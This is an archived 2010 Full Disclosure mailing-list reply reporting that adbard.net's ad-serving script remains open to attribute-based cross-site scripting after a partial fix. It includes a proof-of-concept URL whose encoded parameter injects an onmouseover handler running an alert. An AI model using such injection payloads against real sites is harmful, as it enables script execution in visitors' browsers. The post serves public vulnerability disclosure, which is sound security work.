Full Disclosure mailing list archives

Re: Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability

From: YGN Ethical Hacker Group <lists () yehg net>
Date: Thu, 19 Aug 2010 23:19:29 +0800

Although it seems to have been fixed, it's still vulnerable to
Attribute-Based XSS.

http://adbard.net/sites/default/modules/ad/serve.php?k=22e342dc6a6a99267a46f18fc5dcecf1&ab_s=18f5d31e3e39e9d3c8d5b850e79d4848&u=http://evil.com?x=%22%20onmouseover=%22alert%28/XSS/%29%22%20%3E

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability YGN Ethical Hacker Group (Aug 17)
- Re: Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability YGN Ethical Hacker Group (Aug 19)